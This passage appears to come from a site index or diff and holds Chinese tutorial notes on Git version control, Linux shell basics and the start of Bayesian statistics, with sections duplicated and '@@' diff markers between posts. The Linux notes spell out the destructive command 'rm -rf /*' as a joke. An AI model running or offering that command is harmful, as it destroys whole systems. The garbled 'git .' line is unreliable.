    $ git log --oneline
    dc47039 (HEAD -> master) change 2
    2b5d3bc change 1
    3520206 create 1.py

    回到 2b5d3bc change 1:

    $ git reset --hard HEAD^
    HEAD is now at 2b5d3bc change 1

    png

    使用commit id:

    $ git reset --hard 2b5d3bc
    HEAD is now at 2b5d3bc change 1

    “回到未来” , 挽救消失的change2

    git reflog 查看所有改动

    $ git reflog
    2b5d3bc (HEAD -> master) HEAD@{0}: reset: moving to 2b5d3bc
    2b5d3bc (HEAD -> master) HEAD@{1}: reset: moving to HEAD^
    dc47039 HEAD@{2}: reset: moving to HEAD
    dc47039 HEAD@{3}: commit (amend): change 2
    8f0a599 HEAD@{4}: commit: change 2
    2b5d3bc (HEAD -> master) HEAD@{5}: commit: change 1
    3520206 HEAD@{6}: commit (initial): create 1.py

    回到change 2:

    $ git reset --hard dc47039
    HEAD is now at dc47039 change 2

    png

    回到从前(checkout 针对单个文件)

    $ git log --oneline
    dc47039 (HEAD -> master) change 2
    2b5d3bc change 1
    3520206 create 1.py

    checkoutchange 1:

    $ git checkout 2b5d3bc -- 1.py

    png

    我们在 1.py 加上一行内容 # I went back to change 1 然后 addcommit 1.py:

    png

    可以看出, 不像 reset 时那样, 我们的 change 2 并没有消失, 但是 1.py 却已经回去了过去, 并改写了未来.

    ]]>
    + 官网

    Git 版本管理 教程系列 | 莫烦 Python (yulizi123.github.io)

    【莫烦 Python】Git 代码版本管理教程

    Git (git-scm.com)

    课程

    Git 安装

    Ubuntu:

    1
    sudo apt-get install git-all

    查看用户名和用户邮箱

    用户名:

    1
    2
    $ git config user.name
    metal-cell

    用户邮箱:

    1
    2
    $ git config user.email
    XXX@qq.com

    Git 流程图

    png

    • Untracked: 未跟踪
    • Unmodified: 未修改
    • Modified: 修改过
    • Staged: 暂存

    创建/修改 版本库

    1
    2
    $ git init
    Initialized empty Git repository in D:/Study/0th-year-master/gitTUT/.git/

    png

    新建一个1.py文件

    png

    git status 查看版本库的状态

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    $ git status
    On branch master

    No commits yet

    Untracked files:
    (use "git add <file>..." to include in what will be committed)

    1.py

    nothing added to commit but untracked files present (use "git add" to track)

    png

    git add 添加进版本库

    现在1.py并没有被放入版本库中(Unstaged), 所以我们要使用add把它添加进版本库(staged):

    1
    $ git add 1.py

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    $ git status
    On branch master

    No commits yet

    Changes to be committed:
    (use "git rm --cached <file>..." to unstage)

    new file: 1.py

    git add .一次性添加文件夹中所有未被添加的文件

    1
    $ git .

    git commit 提交改变

    1
    2
    3
    4
    $ git commit -m "create 1.py"
    [master (root-commit) 3520206] create 1.py
    1 file changed, 0 insertions(+), 0 deletions(-)
    create mode 100644 1.py

    png

    记录修改(log & diff)

    修改记录 log

    1
    2
    3
    4
    5
    6
    $ git log
    commit XXX (HEAD -> master)
    Author: XXX <XXX@qq.com>
    Date: Sat Aug 13 11:53:09 2022 +0800

    create 1.py

    我们对1.py文件进行一次修改:

    png

    然后我们就能在status中看到修改还没被提交的信息了

    1
    2
    3
    4
    5
    6
    7
    8
    9
    $ git status
    On branch master
    Changes not staged for commit:
    (use "git add <file>..." to update what will be committed)
    (use "git checkout -- <file>..." to discard changes in working directory)

    modified: 1.py

    no changes added to commit (use "git add" and/or "git commit -a")

    把这次修改添加(add)到可被提交的(commit)的状态, 然后再提交(commit)这次的修改:

    1
    2
    3
    4
    $ git add 1.py
    $ git commit -m "change 1"
    [master 2b5d3bc] change 1
    1 file changed, 1 insertion(+)

    png

    再次查看 log, 现在我们就能看到 create 1.pychange 1 这两条修改信息了. 而且做出这两条 commit 的 ID, 修改的 Author, 修改 Date 也被显示在上面.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    $ git log
    commit XXX (HEAD -> master)
    Author: XXX <XXX@qq.com>
    Date: Sat Aug 13 12:15:33 2022 +0800

    change 1

    commit XXXX
    Author: XXX <XXX@qq.com>
    Date: Sat Aug 13 11:53:09 2022 +0800

    create 1.py

    如果删除一部分代码, 也会被记录上, 比如把 a = 1 改成 a = 2, 再添加一个 b = 1.

    png

    查看 unstaged

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    $ git diff
    diff --git a/1.py b/1.py
    index d25d49e..61ce15f 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,2 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    \ No newline at end of file

    png

    查看 staged (–cached)

    如果想要查看这次还没 add (unstaged) 的修改部分 和上个已经 commit 的文件有何不同, 我们将使用 $ git diff:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    $ git add .
    diff --git a/1.py b/1.py
    index d25d49e..61ce15f 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,2 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    \ No newline at end of file

    查看 staged & unstaged (HEAD)

    还有种方法让我们可以查看 add 过 (staged) 和 没 add (unstaged) 的修改, 比如我们再修改一下 1.py 但不 add:

    png

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    # 对比三种不同的 diff 形式
    $ git diff HEAD # staged & unstaged
    diff --git a/1.py b/1.py
    index d25d49e..ac13cf6 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,3 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    +c = b
    \ No newline at end of file
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    $ git diff  # unstaged
    diff --git a/1.py b/1.py
    index 61ce15f..ac13cf6 100644
    --- a/1.py
    +++ b/1.py
    @@ -1,2 +1,3 @@
    a = 2
    -b = 1
    \ No newline at end of file
    +b = 1
    +c = b
    \ No newline at end of file
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    $ git diff --cached  # staged
    diff --git a/1.py b/1.py
    index d25d49e..61ce15f 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,2 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    \ No newline at end of file

    为了下节内容, 我们保持这次修改, 全部 add 变成 staged 状态, 并 commit.

    1
    2
    3
    4
    $ git add .
    $ git commit -m "change 2"
    [master 8f0a599] change 2
    1 file changed, 3 insertions(+), 1 deletion(-)

    png

    回到从前

    修改已 commit 的版本

    有时候我们总会忘了什么, 比如已经提交了 commit 却发现在这个 commit 中忘了附上另一个文件. 接下来我们模拟这种情况. 上节内容中, 我们最后一个 commitchange 2, 我们将要添加另外一个文件, 将这个修改也 commitchange 2. 所以我们复制 1.py 这个文件, 改名为 2.py. 并把 2.py 变成 staged, 然后使用 --amend 将这次改变合并到之前的 change 2 中.

    png

    1
    2
    3
    4
    5
    6
    $ git add 2.py
    $ git commit --amend --no-edit
    [master dc47039] change 2
    Date: Sat Aug 13 12:41:55 2022 +0800
    2 files changed, 6 insertions(+), 1 deletion(-)
    create mode 100644 2.py

    --no-edit: 不编辑, 直接合并到上一个 commit

    1
    2
    3
    4
    $ git log --oneline
    dc47039 (HEAD -> master) change 2
    2b5d3bc change 1
    3520206 create 1.py

    reset 回到 add 之前

    有时我们添加 add 了修改, 但是又后悔, 并想补充一些内容再 add. 这时, 我们有一种方式可以回到 add 之前. 比如在 1.py 文件中添加这一行:

    png

    然后 addstaged 再返回到 add 之前:

    1
    2
    3
    4
    5
    6
    7
    8
    $ git add 1.py
    $ git status -s
    M 1.py
    $ git reset 1.py
    Unstaged changes after reset:
    M 1.py
    $ git status -s
    M 1.py

    png

    reset 回到 commit 之前

    png

    每个 commit 都有自己的 id 数字号, HEAD 是一个指针, 指引当前的状态是在哪个 commit. 最近的一次 commit 在最右边, 我们如果要回到过去, 就是让 HEAD 回到过去并 reset 此时的 HEAD 到过去的位置.

    1
    2
    $ git reset --hard HEAD
    HEAD is now at dc47039 change 2

    查看所有的 log:

    1
    2
    3
    4
    $ git log --oneline
    dc47039 (HEAD -> master) change 2
    2b5d3bc change 1
    3520206 create 1.py

    回到 2b5d3bc change 1:

    1
    2
    $ git reset --hard HEAD^
    HEAD is now at 2b5d3bc change 1

    png

    使用commit id:

    1
    2
    $ git reset --hard 2b5d3bc
    HEAD is now at 2b5d3bc change 1

    “回到未来” , 挽救消失的change2

    git reflog 查看所有改动

    1
    2
    3
    4
    5
    6
    7
    8
    $ git reflog
    2b5d3bc (HEAD -> master) HEAD@{0}: reset: moving to 2b5d3bc
    2b5d3bc (HEAD -> master) HEAD@{1}: reset: moving to HEAD^
    dc47039 HEAD@{2}: reset: moving to HEAD
    dc47039 HEAD@{3}: commit (amend): change 2
    8f0a599 HEAD@{4}: commit: change 2
    2b5d3bc (HEAD -> master) HEAD@{5}: commit: change 1
    3520206 HEAD@{6}: commit (initial): create 1.py

    回到change 2:

    1
    2
    $ git reset --hard dc47039
    HEAD is now at dc47039 change 2

    png

    回到从前(checkout 针对单个文件)

    1
    2
    3
    4
    $ git log --oneline
    dc47039 (HEAD -> master) change 2
    2b5d3bc change 1
    3520206 create 1.py

    checkoutchange 1:

    1
    $ git checkout 2b5d3bc -- 1.py

    png

    我们在 1.py 加上一行内容 # I went back to change 1 然后 addcommit 1.py:

    png

    可以看出, 不像 reset 时那样, 我们的 change 2 并没有消失, 但是 1.py 却已经回去了过去, 并改写了未来.

    ]]>
    @@ -9861,7 +9861,7 @@ /posts/Linux-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88linux%EF%BC%89/ - 官网

    Linux 简易教学 | 莫烦 Python (yulizi123.github.io)

    【莫烦 Python】Linux 简易教学

    课程

    在 Ubuntu 中打开 Terminal 窗口

    Ctrl+Shift+T

    png

    和文件打交道

    在 Terminal 中, 默认打开文件管理器中的 Home 文件夹, 可以使用 pwd 命令查看当前文件路径

    gz@ubuntu:~$ pwd
    /home/gz

    png

    cd 指令

    使用 cd 指令, 我们能在 Terminal 中轻松切换到不同的文件夹

    gz@ubuntu:~$ cd Documents
    gz@ubuntu:~/Documents$

    接着你会看到它在下一行跳出了这个东西, 在 $ 前面的 ~/Documents 就说明你现在已经在 Documents 这个文件夹里了. 你现在要执行的命令将会在这个目录下生效.

    cd… 返回上一级目录

    gz@ubuntu:~/Documents$ cd ..
    gz@ubuntu:~$

    cd 去往子文件夹

    gz@ubuntu:~$ cd Documents/folder1
    gz@ubuntu:~/Documents/folder1$

    png

    cd - 返回刚刚所在的目录

    gz@ubuntu:~/Documents/folder1$ cd -
    /home/gz
    gz@ubuntu:~$

    cd …/… 向上返回两次

    gz@ubuntu:~$ cd Documents/folder1
    gz@ubuntu:~/Documents/folder1$ cd ../..
    gz@ubuntu:~$

    cd~ 去往 Home 文件夹

    gz@ubuntu:~/Documents/folder1$ cd ~
    gz@ubuntu:~$

    cd 绝对路径

    gz@ubuntu:~/Documents/folder1$ cd ~
    gz@ubuntu:~$

    ls 指令

    查看文件夹里的文件内容

    png

    gz@ubuntu:~/Documents$ ls
    file1 folder1

    ls -l (long 的简写)输出详细信息

    gz@ubuntu:~/Documents$ ls -l
    total 4
    -rw-rw-r-- 1gz gz 0 Aug 11 21:32 file1
    drwxrwxr-x 2gz gz 4096 Aug 11 21:12 folder1

    ls -a (all 的简写)显示所有文件, 还会显示隐藏的文件(以.开头)

    gz@ubuntu:~/Documents$ ls -a
    . .. file1 folder1

    ls -lh (human 的简写) 输出的字符串方便人看

    gz@ubuntu:~/Documents$ ls -lh
    total 4.0K
    -rw-rw-r-- 1gz gz 0 Aug 11 21:32 file1
    drwxrwxr-x 2gz gz 4.0K Aug 11 21:12 folder1

    ls --help 查看帮助文档

    gz@ubuntu:~/Documents$ ls --help

    touch 新建文件

    新建一个空白文件

    gz@ubuntu:~/Documents$ touch file2

    新建多个空白文件 以空格分开

    gz@ubuntu:~/Documents$ touch file3 file4 file5

    png

    cp 复制

    cp(copy)是复制文件或者文件夹的命令, 常用的方式是复制"老文件"到"新文件"

    gz@ubuntu:~/Documents$ cp file1 file1copy

    png

    cp -i (interactive, 交互式)

    注意: 如果 file1copy 已经存在, 它将会直接覆盖已经存在的 file1copy, 如果要直接覆盖, 我们在 cp 后面加一个选项

    gz@ubuntu:~/Documents$ cp -i file1 file1copy
    cp: overwrite 'file1copy'? n
    gz@ubuntu:~/Documents$ cp -i file1 file1copy
    cp: overwrite 'file1copy'? y

    将文件复制进文件夹

    gz@ubuntu:~/Documents$ cp file1 folder1/

    png

    复制文件夹, 需要加上 -R (recursive, 递归)

    错误示范:

    gz@ubuntu:~/Documents$ cp folder1/ folder2/
    cp: -r not specified; omitting directory 'folder1/'

    正确示范:

    gz@ubuntu:~/Documents$ cp -R folder1/ folder2/

    png

    * 复制多个文件

    gz@ubuntu:~/Documents$ cp file* folder2/

    png

    单独选定多个文件复制到某个文件夹

    gz@ubuntu:~/Documents$ cp file1copy file2 folder1/

    png

    mv 剪切

    移动去文件夹

    gz@ubuntu:~/Documents$ mv file1 folder1/

    重命名文件

    将文件移动到原始的地点, 但以不同的文件名命名

    gz@ubuntu:~/Documents$ mv file1 file1rename

    mkdir 建立文件夹

    gz@ubuntu:~/Documents$ mkdir folder2

    在文件夹里再创建文件夹

    gz@ubuntu:~/Documents$ mkdir folder2/f2

    png

    rmdir 移除文件夹

    将要移除的文件夹必须是空的, 不然会失败

    尝试移除非空文件夹:

    gz@ubuntu:~/Documents$ rmdir folder2
    rmdir: failed to remove 'folder2': Directory not empty

    移出空文件夹:

    gz@ubuntu:~/Documents$ rmdir folder2/f2

    rm 移除文件

    移除单个文件

    gz@ubuntu:~/Documents$ rm file1

    -i-I有提示地移除文件

    gz@ubuntu:~/Documents$ rm -i file2 file3 file4
    rm: remove regular empty file 'file2'? y
    rm: remove regular empty file 'file3'?
    rm: remove regular empty file 'file4'? y

    -I要超过 3 个文件才进行提示

    gz@ubuntu:~/Documents$ rm -I *
    rm: remove 6 arguments? y

    -r 或 -R 删除文件夹

    gz@ubuntu:~/Documents$ rm -r folder1

    删库跑路

    rm -rf /*

    rm: 移除命令

    r: 递归文件删除

    f: 强制删除

    /:根目录

    *: 所有文件

    nano 文字编辑

    gz@ubuntu:~/Documents$ nano t.py

    png

    png

    cat (cantenate, 链接)

    查看文件内容

    gz@ubuntu:~/Documents$ cat t.py
    print("Hello world!")
    print("This is a Python script!")

    > 将文件的内容放到另一个文件里

    gz@ubuntu:~/Documents$ cat t.py > t1.py

    png

    > 将多个文件的内容打包一起放入另一个文件

    gz@ubuntu:~/Documents$ cat t.py t1.py > t2.py

    png

    >> 将内容添加在一个文件末尾

    gz@ubuntu:~/Documents$ cat t3.py >> t2.py

    png

    文件权限

    ls -l 查看文件权限

    gz@ubuntu:~/Documents$ ls -l
    total 16
    -rw-rw-r-- 1gz gz 56 Aug 11 22:17 t1.py
    -rw-rw-r-- 1gz gz 132 Aug 11 22:22 t2.py
    -rw-rw-r-- 1gz gz 20 Aug 11 22:21 t3.py
    -rw-rw-r-- 1gz gz 56 Aug 11 22:15 t.py

    png

    • Type: 很多种 (最常见的是 - 为文件, d 为文件夹, 其他的还有l, n … 这种东西, 真正自己遇到了, 网上再搜就好, 一次性说太多记不住的).

    • User: 后面跟着的三个空是使用 User 的身份能对这个做什么处理 (r 能读; w 能写; x 能执行; - 不能完成某个操作).

    • Group: 一个 Group 里可能有一个或多个 user, 这些权限的样式和 User 一样.

    • Others: 除了 User 和 Group 以外人的权限.

    以下t1.py为例

    -rw-rw-r-- 1gz gz  56 Aug 11 22:17 t1.py

    -文件; rw-用户可以读写, 不可执行; rw-组用户可以读写, 不可执行;r–其他用户可读, 不可执行

    chmod 修改权限

    尝试运行 t1.py

    gz@ubuntu:~/Documents$ python3 t1.py
    Hello world!
    This is a Python script!

    但是该命令下运行 t1.py, 会因没有相应权限而被阻止

    gz@ubuntu:~/Documents$ ./t1.py
    bash: ./t1.py: Permission denied

    t1.py 增加执行权限

    gz@ubuntu:~/Documents$ chmod u+x t1.py

    [谁]

    • u: 对于 User 修改
    • g: 对于 Group 修改
    • o: 对于 Others 修改
    • a: (all) 对于所有人修改

    [怎么修改]

    • +, -, =: 作用的形式, 加上, 减掉, 等于某些权限
    • r, w, x 或者多个权限一起, 比如 rx

    一个使用 Python 的技巧

    t1.py 文件头添加

    #!/usr/bin/python3

    若有执行权限, 就可以这么执行:

    gz@ubuntu:~/Documents$ ./t1.py
    Hello world!
    This is a Python script!

    png

    否则执行失败:

    gz@ubuntu:~/Documents$ ./t1.py
    ./t1.py: line 1: syntax error near unexpected token `"Hello world!"'
    ./t1.py: line 1: `print("Hello world!")'

    远程操控

    怎么样从 MacOS/Windows 或 Linux 通过 SSH 远程 Linux

    Windows 下:

    ssh [用户名]@[linux 系统的 ip 地址]

    linux 查看本机 IP 地址:(ifconfig 命令, Windows 为 ipconfig 命令…我还以为我拼错了)

    gz@ubuntu:~$ ifconfig
    ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
    inet 192.168.89.130 netmask 255.255.255.0 broadcast 192.168.89.255
    inet6 fe80::8565:1325:bab3:8017 prefixlen 64scopeid 0x20<link>
    ether 00:0c:29:95:09:31 txqueuelen 1000 (Ethernet)
    RX packets 27262 bytes 18561854 (18.5 MB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 15044 bytes 2133723 (2.1 MB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
    inet 127.0.0.1 netmask 255.0.0.0
    inet6 ::1 prefixlen 128scopeid 0x10<host>
    loop txqueuelen 1000 (Local Loopback)
    RX packets 4135 bytes 456719 (456.7 KB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 4135 bytes 456719 (456.7 KB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    (192.168.89.130)

    png

    怎么样从手机 (Android 安卓/IOS 苹果) 通过 SSH 远程 Linux

    在 app store 里搜"JuiceSSH"

    怎么样用 TeamViewer 和 VNC 从远程控制电脑

    TeamViewer: 适合公网, 对网速要求高

    VNC: 适合局域网

    云端机器学习

    算了, 以后有机会再折腾吧…

    ]]>
    + 官网

    Linux 简易教学 | 莫烦 Python (yulizi123.github.io)

    【莫烦 Python】Linux 简易教学

    课程

    在 Ubuntu 中打开 Terminal 窗口

    Ctrl+Shift+T

    png

    和文件打交道

    在 Terminal 中, 默认打开文件管理器中的 Home 文件夹, 可以使用 pwd 命令查看当前文件路径

    1
    2
    gz@ubuntu:~$ pwd
    /home/gz

    png

    cd 指令

    使用 cd 指令, 我们能在 Terminal 中轻松切换到不同的文件夹

    1
    2
    gz@ubuntu:~$ cd Documents
    gz@ubuntu:~/Documents$

    接着你会看到它在下一行跳出了这个东西, 在 $ 前面的 ~/Documents 就说明你现在已经在 Documents 这个文件夹里了. 你现在要执行的命令将会在这个目录下生效.

    cd… 返回上一级目录

    1
    2
    gz@ubuntu:~/Documents$ cd ..
    gz@ubuntu:~$

    cd 去往子文件夹

    1
    2
    gz@ubuntu:~$ cd Documents/folder1
    gz@ubuntu:~/Documents/folder1$

    png

    cd - 返回刚刚所在的目录

    1
    2
    3
    gz@ubuntu:~/Documents/folder1$ cd -
    /home/gz
    gz@ubuntu:~$

    cd …/… 向上返回两次

    1
    2
    3
    gz@ubuntu:~$ cd Documents/folder1
    gz@ubuntu:~/Documents/folder1$ cd ../..
    gz@ubuntu:~$

    cd~ 去往 Home 文件夹

    1
    2
    gz@ubuntu:~/Documents/folder1$ cd ~
    gz@ubuntu:~$

    cd 绝对路径

    1
    2
    gz@ubuntu:~/Documents/folder1$ cd ~
    gz@ubuntu:~$

    ls 指令

    查看文件夹里的文件内容

    png

    1
    2
    gz@ubuntu:~/Documents$ ls
    file1 folder1

    ls -l (long 的简写)输出详细信息

    1
    2
    3
    4
    gz@ubuntu:~/Documents$ ls -l
    total 4
    -rw-rw-r-- 1gz gz 0 Aug 11 21:32 file1
    drwxrwxr-x 2gz gz 4096 Aug 11 21:12 folder1

    ls -a (all 的简写)显示所有文件, 还会显示隐藏的文件(以.开头)

    1
    2
    gz@ubuntu:~/Documents$ ls -a
    . .. file1 folder1

    ls -lh (human 的简写) 输出的字符串方便人看

    1
    2
    3
    4
    gz@ubuntu:~/Documents$ ls -lh
    total 4.0K
    -rw-rw-r-- 1gz gz 0 Aug 11 21:32 file1
    drwxrwxr-x 2gz gz 4.0K Aug 11 21:12 folder1

    ls --help 查看帮助文档

    1
    gz@ubuntu:~/Documents$ ls --help

    touch 新建文件

    新建一个空白文件

    1
    gz@ubuntu:~/Documents$ touch file2

    新建多个空白文件 以空格分开

    1
    gz@ubuntu:~/Documents$ touch file3 file4 file5

    png

    cp 复制

    cp(copy)是复制文件或者文件夹的命令, 常用的方式是复制"老文件"到"新文件"

    1
    gz@ubuntu:~/Documents$ cp file1 file1copy

    png

    cp -i (interactive, 交互式)

    注意: 如果 file1copy 已经存在, 它将会直接覆盖已经存在的 file1copy, 如果要直接覆盖, 我们在 cp 后面加一个选项

    1
    2
    3
    4
    gz@ubuntu:~/Documents$ cp -i file1 file1copy
    cp: overwrite 'file1copy'? n
    gz@ubuntu:~/Documents$ cp -i file1 file1copy
    cp: overwrite 'file1copy'? y

    将文件复制进文件夹

    1
    gz@ubuntu:~/Documents$ cp file1 folder1/

    png

    复制文件夹, 需要加上 -R (recursive, 递归)

    错误示范:

    1
    2
    gz@ubuntu:~/Documents$ cp folder1/ folder2/
    cp: -r not specified; omitting directory 'folder1/'

    正确示范:

    1
    gz@ubuntu:~/Documents$ cp -R folder1/ folder2/

    png

    * 复制多个文件

    1
    gz@ubuntu:~/Documents$ cp file* folder2/

    png

    单独选定多个文件复制到某个文件夹

    1
    gz@ubuntu:~/Documents$ cp file1copy file2 folder1/

    png

    mv 剪切

    移动去文件夹

    1
    gz@ubuntu:~/Documents$ mv file1 folder1/

    重命名文件

    将文件移动到原始的地点, 但以不同的文件名命名

    1
    gz@ubuntu:~/Documents$ mv file1 file1rename

    mkdir 建立文件夹

    1
    gz@ubuntu:~/Documents$ mkdir folder2

    在文件夹里再创建文件夹

    1
    gz@ubuntu:~/Documents$ mkdir folder2/f2

    png

    rmdir 移除文件夹

    将要移除的文件夹必须是空的, 不然会失败

    尝试移除非空文件夹:

    1
    2
    gz@ubuntu:~/Documents$ rmdir folder2
    rmdir: failed to remove 'folder2': Directory not empty

    移出空文件夹:

    1
    gz@ubuntu:~/Documents$ rmdir folder2/f2

    rm 移除文件

    移除单个文件

    1
    gz@ubuntu:~/Documents$ rm file1

    -i-I有提示地移除文件

    1
    2
    3
    4
    gz@ubuntu:~/Documents$ rm -i file2 file3 file4
    rm: remove regular empty file 'file2'? y
    rm: remove regular empty file 'file3'?
    rm: remove regular empty file 'file4'? y

    -I要超过 3 个文件才进行提示

    1
    2
    gz@ubuntu:~/Documents$ rm -I *
    rm: remove 6 arguments? y

    -r 或 -R 删除文件夹

    1
    gz@ubuntu:~/Documents$ rm -r folder1

    删库跑路

    1
    rm -rf /*

    rm: 移除命令

    r: 递归文件删除

    f: 强制删除

    /:根目录

    *: 所有文件

    nano 文字编辑

    1
    gz@ubuntu:~/Documents$ nano t.py

    png

    png

    cat (cantenate, 链接)

    查看文件内容

    1
    2
    3
    gz@ubuntu:~/Documents$ cat t.py
    print("Hello world!")
    print("This is a Python script!")

    > 将文件的内容放到另一个文件里

    1
    gz@ubuntu:~/Documents$ cat t.py > t1.py

    png

    > 将多个文件的内容打包一起放入另一个文件

    1
    gz@ubuntu:~/Documents$ cat t.py t1.py > t2.py

    png

    >> 将内容添加在一个文件末尾

    1
    gz@ubuntu:~/Documents$ cat t3.py >> t2.py

    png

    文件权限

    ls -l 查看文件权限

    1
    2
    3
    4
    5
    6
    gz@ubuntu:~/Documents$ ls -l
    total 16
    -rw-rw-r-- 1gz gz 56 Aug 11 22:17 t1.py
    -rw-rw-r-- 1gz gz 132 Aug 11 22:22 t2.py
    -rw-rw-r-- 1gz gz 20 Aug 11 22:21 t3.py
    -rw-rw-r-- 1gz gz 56 Aug 11 22:15 t.py

    png

    • Type: 很多种 (最常见的是 - 为文件, d 为文件夹, 其他的还有l, n … 这种东西, 真正自己遇到了, 网上再搜就好, 一次性说太多记不住的).

    • User: 后面跟着的三个空是使用 User 的身份能对这个做什么处理 (r 能读; w 能写; x 能执行; - 不能完成某个操作).

    • Group: 一个 Group 里可能有一个或多个 user, 这些权限的样式和 User 一样.

    • Others: 除了 User 和 Group 以外人的权限.

    以下t1.py为例

    1
    -rw-rw-r-- 1gz gz  56 Aug 11 22:17 t1.py

    -文件; rw-用户可以读写, 不可执行; rw-组用户可以读写, 不可执行;r–其他用户可读, 不可执行

    chmod 修改权限

    尝试运行 t1.py

    1
    2
    3
    gz@ubuntu:~/Documents$ python3 t1.py
    Hello world!
    This is a Python script!

    但是该命令下运行 t1.py, 会因没有相应权限而被阻止

    1
    2
    gz@ubuntu:~/Documents$ ./t1.py
    bash: ./t1.py: Permission denied

    t1.py 增加执行权限

    1
    gz@ubuntu:~/Documents$ chmod u+x t1.py

    [谁]

    • u: 对于 User 修改
    • g: 对于 Group 修改
    • o: 对于 Others 修改
    • a: (all) 对于所有人修改

    [怎么修改]

    • +, -, =: 作用的形式, 加上, 减掉, 等于某些权限
    • r, w, x 或者多个权限一起, 比如 rx

    一个使用 Python 的技巧

    t1.py 文件头添加

    1
    #!/usr/bin/python3

    若有执行权限, 就可以这么执行:

    1
    2
    3
    gz@ubuntu:~/Documents$ ./t1.py
    Hello world!
    This is a Python script!

    png

    否则执行失败:

    1
    2
    3
    gz@ubuntu:~/Documents$ ./t1.py
    ./t1.py: line 1: syntax error near unexpected token `"Hello world!"'
    ./t1.py: line 1: `print("Hello world!")'

    远程操控

    怎么样从 MacOS/Windows 或 Linux 通过 SSH 远程 Linux

    Windows 下:

    1
    ssh [用户名]@[linux 系统的 ip 地址]

    linux 查看本机 IP 地址:(ifconfig 命令, Windows 为 ipconfig 命令…我还以为我拼错了)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    gz@ubuntu:~$ ifconfig
    ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
    inet 192.168.89.130 netmask 255.255.255.0 broadcast 192.168.89.255
    inet6 fe80::8565:1325:bab3:8017 prefixlen 64scopeid 0x20<link>
    ether 00:0c:29:95:09:31 txqueuelen 1000 (Ethernet)
    RX packets 27262 bytes 18561854 (18.5 MB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 15044 bytes 2133723 (2.1 MB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
    inet 127.0.0.1 netmask 255.0.0.0
    inet6 ::1 prefixlen 128scopeid 0x10<host>
    loop txqueuelen 1000 (Local Loopback)
    RX packets 4135 bytes 456719 (456.7 KB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 4135 bytes 456719 (456.7 KB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    (192.168.89.130)

    png

    怎么样从手机 (Android 安卓/IOS 苹果) 通过 SSH 远程 Linux

    在 app store 里搜"JuiceSSH"

    怎么样用 TeamViewer 和 VNC 从远程控制电脑

    TeamViewer: 适合公网, 对网速要求高

    VNC: 适合局域网

    云端机器学习

    算了, 以后有机会再折腾吧…

    ]]>
    @@ -9888,7 +9888,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8017/ - Python-人工智能数学基础 17

    17 贝叶斯分析

    17.1 贝叶斯分析概述

    17.1.2 贝叶斯学派与经典统计学派的争论

    统计推断是根据样本信息对总体分布或总体的特征数进行推断,事实上,这经典学派对统计推断的规定,这里的统计推断使用到两种信息:总体信息和样本信息;而贝叶斯学派认为,除了上述两种信息以外,统计推断还应该使用第三种信息:先验信息

    $$P(\color{red}\theta|\color{blue}y)$$

    统计学派
    • 观察到的数据被认为是随机的, 因为它们是随机过程的实现, 因此每次观察系统时都会发生变化.

    • 模型参数被认为是固定的, 参数的值是未知的, 但它们是固定的, 因此我们对它们进行条件设置.

    贝叶斯学派
    • 数据被认为是固定的, 它们使用的是随机的, 但是一旦它们被拿到手了, 就不会改变.

    • 贝叶斯用概率分布来描述模型参数的不确定性, 这样一来, 它们就是随机的.

    17.1.3 贝叶斯公式

    • 公式:

    $$P(B_i|A)=\frac{P(A|B_i)P(B_i)}{P(A)}=\frac{P(A|B_i)P(B_i)}{\Sigma^n_{j=1}P(A|B_j)P(B_j)}, i=1, 2, …, n$$

    • 估计(离散型):

    $$\pi(\theta_i|x)=\frac{f(x|\theta_i)\pi(\theta_i)}{\Sigma_i f(x|\theta_i)\pi(\theta_i)}$$

    • 估计(连续型):

    $$\pi(\theta|x)=\frac{f(x|\theta)\pi(\theta)}{\int_\Theta f(x|\theta)\pi(\theta)d\theta}$$

    17.1.4 贝叶斯解释

    1 先验信息和先验分布

    指抽样之前对所研究的问题的认识, 记为$\pi(\theta)$

    2 后验分布

    一旦获得抽样信息$x$后, 人们对参数$\theta$的认识就发生了改变, 调整后会获得对$\theta$的新认识, 称为后验概率, 记为$\pi(\theta|x)$

    3 共轭先验分布

    先验分布的选择具有主观性, 一般选择无信息先验分布和共轭先验分布

    假如由样本$x$信息得到的后验分布概率$\pi(\theta|x)$和先验密度函数$\pi(\theta)$属于相同的分布类型, 则称$\pi(\theta)$是参数$\theta$的共轭先验分布

    走进贝叶斯统计(二)—— 共轭先验分布

    例 17.2 (共轭先验的例子 Beta-伯努利分布)

